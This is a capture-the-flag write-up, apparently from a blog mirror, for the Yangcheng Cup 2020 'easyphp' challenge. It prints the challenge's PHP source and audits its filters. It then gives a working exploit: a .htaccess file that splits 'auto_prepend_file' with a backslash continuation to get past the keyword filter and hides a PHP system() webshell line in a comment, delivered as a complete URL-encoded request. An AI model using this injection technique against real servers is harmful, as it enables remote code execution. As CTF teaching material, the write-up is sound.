当前位置:网站首页>[Yangcheng cup 2020] easyphp
[Yangcheng cup 2020] easyphp
2022-07-02 23:02:00 【-Gardenia blue-】
<?php
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
if(!isset($_GET['content']) || !isset($_GET['filename'])) {
highlight_file(__FILE__);
die();
}
$content = $_GET['content'];
if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
echo "Hacker";
die();
}
$filename = $_GET['filename'];
if(preg_match("/[^a-z\.]/", $filename) == 1) {
echo "Hacker";
die();
}
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
file_put_contents($filename, $content . "\nHello, world");
?>
Code audit
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
If not index.php page , Page data will be deleted
if(!isset($_GET['content']) || !isset($_GET['filename'])) {
highlight_file(__FILE__);
die();
} If no incoming content or filename Parameters are directly die
$content = $_GET['content'];
if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
echo "Hacker";
die();
}
Pass in parameters content To filter , Not by on html type flag upload file
$filename = $_GET['filename'];
if(preg_match("/[^a-z\.]/", $filename) == 1) {
echo "Hacker";
die();
}
Pass in parameters filename To filter ,filename Only lowercase letters and . constitute , otherwise die
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
Just like the initial filtering , If not index.php The data will be deleted
file_put_contents($filename, $content . "\nHello, world");
Put our incoming content content write in filename Inside
But notice that there is a splice here Hello world, It will cause our program to report errors
The original idea was filename by a.php,content Pass in a sentence , Result practice :
Discover as html Output directly on the page , There's no resolution , Maybe only parsing is set in the background index.php, After all, the code is right index.php There are many reminders , So I wonder if I can index.php We analyzed our htaccess, Just change the configuration item , So the learning boss learned that he really wanted to use htaccess To get flag
php_value auto_prepend_fil\
e .htaccess
#<?php system('cat /fla?');?>\
htaccess in \ The function of is to splice context , amount to php_value auto_prepend_file.htaccess
Because in order to bypass the filter, from file In the middle
Among them, the use of annotations # Write a sentence into , Because in htaccess Is the function of the annotator , But in php When it comes to execution , In a word, the Trojan horse will be executed
In the third line \ It is for splicing with the last part of the code Hello,world Also as a note , otherwise hello world Go to the fourth line to report an error
?filename=.htaccess&content=php_value%20auto_prepend_fil%5C%0Ae%20.htaccess%0A%23%3C%3Fphp%20system('cat%20/fla?')%3B%3F%3E%5C
边栏推荐
- [leetcode] reverse the word III in the string [557]
- 静态文件显示问题
- [chestnut sugar GIS] ArcMap - why should the tick of classic capture be removed when using custom capture?
- Golang面试整理 三 简历如何书写
- Qt QProgressBar详解
- Odoo13 build a hospital HRP environment (detailed steps)
- [chestnut sugar GIS] ArcScene - how to make elevation map with height
- [LeetCode] 存在重复元素【217】
- Jerry's prototype has no touch, and the reinstallation becomes normal after dismantling [chapter]
- Dahua cloud native load balancing article - the passenger flow of small restaurants has increased
猜你喜欢
情感对话识别与生成简述
Xiaopeng P7 had an accident and the airbag did not pop up. Is this normal?
世界环境日 | 周大福用心服务推动减碳环保
Hanging mirror security won four global infosec awards on rsac2022
【板栗糖GIS】global mapper 如何通过dsm批量制作贴地等高线
Odoo13 build a hospital HRP environment (detailed steps)
性能优化----严苛模式
[leetcode] reverse the word III in the string [557]
[chestnut sugar GIS] how does global mapper batch produce ground contour lines through DSM
Mask R-CNN
随机推荐
Chow-Liu Tree
Qt QProgressBar详解
Jericho's thimble reaction when directly touching the prototype is abnormal [chapter]
Go语言sqlx库操作SQLite3数据库增删改查
数据分析学习记录--用EXCEL完成简单的单因素方差分析
Analyse des données dossiers d'apprentissage - - analyse simple de la variance à facteur unique avec Excel
AES高级加密协议的动机阐述
Kubernetes uses the host name to allocate the pod on the specified node
Go four singleton modes
Uniapp wechat login returns user name and Avatar
[chestnut sugar GIS] ArcScene - how to make elevation map with height
Baidu AI Cloud - create a face recognition application
泛型与反射,看这篇就够了
Golang interview finishing three resumes how to write
分享 10 个 JS 闭包面试题(图解),进来看看你能答对多少
[chestnut sugar GIS] ArcMap - why should the tick of classic capture be removed when using custom capture?
移动端 1px 像素兼容性问题,实现1px 边框
地平线2022年4月最新方案介绍
解决Chrome浏览器和Edeg浏览器主页被篡改的方法
归并排序详解及应用